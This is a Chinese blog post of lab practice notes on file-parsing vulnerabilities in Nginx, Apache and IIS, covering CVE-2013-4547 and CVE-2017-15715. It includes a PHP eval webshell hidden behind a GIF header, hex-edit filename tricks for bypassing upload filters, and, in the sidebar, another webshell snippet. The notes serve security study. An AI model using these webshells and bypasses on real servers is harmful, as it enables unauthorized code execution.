文件解析练习

最新推荐文章于 2024-10-04 21:13:01 发布
最新推荐文章于 2024-10-04 21:13:01 发布
阅读量355 收藏 9
点赞数 5
文章标签: 安全 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_69602647/article/details/140800519
版权

Nginx解析漏洞

nginx_parsing

这个解析漏洞其实是PHP CGI的漏洞,在PHP的配置⽂件中有⼀个关键的选项cgi.fix_pathinfo默认是开 启的,当URL中有不存在的文件,PHP就会向前递归解析。在⼀个⽂件/xx.jpg后⾯加上/.php会将 /x x.jpg/xx.php 解析为 php ⽂件。

使⽤ 1.jpg/.php 绕过:

上传有gif文件头的 有木马的jpg文件

GIF89a
<?php @eval($_POST['cmd']);?>

绕过:

CVE-2013-4547::

此漏洞为⽂件名逻辑漏洞,该漏洞在上传图⽚时,修改其16进制编码可使其绕过策略,导致解析为 php。 当Nginx得到⼀个⽤户请求时,⾸先对url进⾏解析,进⾏正则匹配,如果匹配到以.php后缀结尾 的⽂件名,会将请求的PHP⽂件交给PHP-CGI去解析。

上传文件ccc.jpg->抓包:

->ccc.jpg  .php

到hex十六进制 找到我们的两个空格 将第二个空格 20改成00   20->00

放包上传:

访问文件的时候 也要改哟!

成功!

CVE-2017-15715:::

Apache HTTPD是⼀款HTTP服务器,它可以通过mod_php来运⾏PHP⽹⻚。其2.4.0~2.4.29版本中存 在⼀个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进⾏解析,导致绕过⼀些服务器的安全 策略。

尝试上传一句话木马 被拦截

在filename:输入的文件名后⾯添加空格 0x20 在改为 0x0a 再次返送即可上传成功....

20->0a->放包

访问的时候 也要加%0a

apache_parsing

在Apache1.x/2.x中Apache 解析⽂件的规则是从右到左开始判断解析,如果后缀名为不可识别⽂件解析, 就再往左判断。如 1.php.xxxxx

上传0.php.jpg->抓包

IIS6.X

目录解析:

在⽹站下建⽴⽂件夹的名字为 .asp/.asa 的⽂件夹,其⽬录内的任何扩展名的⽂件都被IIS当作asp ⽂件来解析并执⾏。

IIS7.X

在IIS7.0和IIS7.5版本下也存在解析漏洞,在默认Fast-CGI开启状况下,在⼀个⽂件路径/xx.jpg 后⾯加上/xx.php会将 /xx.jpg/xx.php 解析为 php ⽂件。

要将php.ini的配置文件  cgi.fix_pathinfo=1 前面的 :(分号) 删除

IIS->配置网站->处理程序映射->PHPStudy_FastCGI->请求限制->取消勾选

漏洞利用:

访问 192.168.26.129/1.jpg/.php

雾魈
关注
11-3 Apache多后缀解析漏洞分析
weixin_43263566的博客
11-24 1619
该漏洞与用户的配置有密切的关系,严格来说属于用户配置问题。Apache文件解析漏洞涉及到 Apache 解析文件的特性。在默认情况下,Apache 允许一个文件具有多个以点分割的后缀,在处理文件时会从右向左识别后缀名。(就是右边的后缀名无法识别,则继续识别左边的)如果运维人员给具有 .php 后缀的文件添加了处理程序 AddHandler application/x-httpd-php .php,那么在文件具有多个后缀的情况下,只要文件含有 .php 后缀,该文件就会被识别为 PHP 文件并进行解析
python 练习100题及答案解析
爱数据爱统计
06-09 1716
变量操作符格式等基础(1~8) 序列索引和切片(9~14) 列表List(15~19) 字典Dict(20~29) 循环Loop(30~35) 函数Function(36~45) 字符串String(046~050) 循环与文件(051~056) 多级字典与JSON(057~062) 循环条件控制(063~068) 英汉翻译字典(069~071) 日期时间(072~076) 用户名和密码检测(077~080) 文件处理统计(081~086) 文件管理(087~095) 爬虫Requests(96-100)
生命在于学习——文件解析
易水哲的博客
08-26 1372
文件解析漏洞
jpg文件当作php文件解析,基于PHP实现通过照片获取ip地址_PHP
weixin_34599958的博客
04-06 811
基于PHP实现通过照片获取ip地址_PHP原创2016-05-27 10:18:350453在本教程中,我们将学习如何用一张照片来盗取ip地址。我的想法是通过修改.htaccess文件,将jpg文件当作php文件解析。下面就是我们需要向.htaccess中添加的代码:AddHandler application/x-httpd-php5 .jpg然后将下面的代码复制到记事本中,命名为gr...
jpg可以执行php嘛,用户上传a.jpg文件文件内容实际为php代码,会不会有安全问题?如果有,如何防止?...
weixin_39992665的博客
03-17 205
很简单,检测文件头,如果不是规定的类型就删除。以下为摘抄自网络的代码示例。function file_type($filename){$file = fopen($filename, "rb");$bin = fread($file, 2); //只读2字节fclose($file);$strInfo = @unpack("C2chars", $bin);$typeCode = intval($s...
Java文件解析
WaY0626的博客
03-12 2969
文件 File类 概述 java.io.File 类是文件和目录路径名的抽象表示,主要用于文件和目录的创建、查找和删除等操作。 构造方法 public File(String pathname) :通过将给定的路径名字符串转换为抽象路径名来创建新的 File实例。 public File(String parent, String child) :从父路径名字符串和子路径名字符串创建新的 File实例。 public File(File parent, String child) :从父抽象路径名
Apache、Nginx、IIS文件解析漏洞
qq_68163788的博客
05-29 1278
文件解析漏洞是指在Web服务器(如Apache、Nginx、IIS)中存在的一种安全漏洞,攻击者可以利用该漏洞来执行恶意代码或获取敏感信息。这种漏洞通常涉及服务器错误地解释用户输入的文件或数据,导致攻击者能够访问服务器上的文件系统、执行任意代码或进行其他未经授权的操作。攻击者通常会尝试通过构造特定的恶意请求来利用文件解析漏洞,从而绕过服务器安全控制机制。
CTF文件上传练习
qq_45927819的博客
08-04 2468
Bugku_文件上传2 今天做题的时候发现了这道题尝试了好久才搞出来,记录一下! 方法一 一个欢迎界面 查看源码:在注释中看到了upload.php 访问upload.php: 只能上传jpg gif png格式的文件,且大小不能超过100kib 我们写一句话木马,改后缀为jpg格式: 上传成功了! 访问一下路径:发现php解析掉了 换一个一句话木马:<script language="php">eval($_REQUEST[ABC])</script> 修改后缀为jpg
文件上传漏洞+解析漏洞详解
m0_55854679的博客
03-05 802
upload-labs通关攻略教程【1-11关】 upload-labs通关攻略教程【12-18关】 文章目录文件上传概述文件上传漏洞测试流程注意client check方法:MIME type(服务端验证通过)小知识介绍方法:getimagesize(php中用来判断目标文件是否为图片)思路:方法(图片木马的制作):解析漏洞IIS6.0【web服务器解析漏洞注意IIS6.0特性练习1练习2CGI解析漏洞练习 文件上传 概述 文件上传功能在web应用系统很常见,比如很多网站注册的时候需要上传头像、上传附件
IO流解析练习
weixin_50114650的博客
09-12 1964
IO流解析练习题 第一次写,希望有什么问题大家及时互相交流哈。 有一个TransRecord.txt文件,保存的是交易记录明细。一行是一条交易明细,每行分7列。 请编码,实现如下功能: 1、设计一个交易记录类TransRecord (金额字段数据类型定为double) 2、解析文件(IO流),将文件中数据,将每条交易明细封装为1个TransRecord对象。所有TransRecord对象,添加到一个集合中,并且打印到控制台;(就是将对象添加到集合并打印集合) BufferedReader 方法readLin
数据库练习题及答案解析.docx
12-14
数据库练习题及答案解析 本文档提供了数据库练习题及答案解析,涵盖了数据库系统的基本概念、关系模型、关系代数、数据库完整性规则等方面的知识点。 一、数据库系统的基本概念 * 数据库(DB)、数据库系统(DBS...
解析linux 文件和目录操作的相关函数
01-01
 文件类型,文件权限ino_t st_ino; i节点号dev_t st_dev; dev_t st_rdev; 设备文件序号nlink_t st_nlink; 链接uid_t st_uid;gid_t st_gid; 用户IDoff_t st_size; 文件大小,此字段只对普通文件、目录...
Simulation 教程文件练习文件
09-05
"Simulation 教程文件练习文件"这一主题涵盖了在工程设计和分析中广泛使用的软件工具——SolidWorks Simulation的深入学习和实践。SolidWorks Simulation是一款基于有限元方法(Finite Element Method, FEM)的...
求二次函数解析练习题[文].pdf
10-29
为了满足您的要求,我将根据标题“求二次函数解析练习题[文].pdf”以及描述“求二次函数解析练习题[文].pdf”所提供的信息,给出与二次函数解析式有关的基础知识点,包括其定义、一般形式、图像特征和求解方法。...
解析几何练习题及答案汇编.pdf
10-25
从给出的文件内容中,我们无法直接获取解析几何的练习题和答案的具体内容,因为文件内容被错误地OCR扫描,导致文字信息混乱且难以理解。不过,我们可以从文件标题中解析出知识点。文件标题为“解析几何练习题及答案...
.888勒索病毒解密方法|勒索病毒解决|勒索病毒恢复|数据库修复
数据恢复研究℃
10-01 787
引言在数字化时代,网络空间的威胁日益增多,其中勒索病毒已成为数据安全领域的一大挑战。近期,.888勒索病毒作为一种新型的恶意软件,正逐渐引起人们的广泛关注。本文将详细介绍.888勒索病毒的特点、如何恢复被其加密的数据文件,以及预防该病毒的有效策略。.888勒索病毒不断更新和变异的特点,是其能够持续威胁网络安全的重要因素。
什么是托管安全信息和事件管理 SIEM?
网络研究观
09-28 1873
SIEM 解决方案是组织网络安全基础设施的重要组成部分
【隐私计算篇】多方安全计算之函数秘密共享(FSS)
最新发布
源泉的小广场
10-04 649
fss、函数秘密共享、函数秘密分享、分布式点函数、DPF、Distributed Point Function、多方安全计算、安全多方计算、MPC、多服务器PIR、SilentOT、PCG for tensor product from LPN and FSS
C语言基础练习解析
4. C语言程序的工作流程包括编辑(编写代码)、编译(将源代码转换为机器码)、连接(组合编译后的目标文件和库文件)和运行(执行执行程序)。C语言区分大小写,这是书写代码时需要注意的规则。 5. 合法的C语言...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值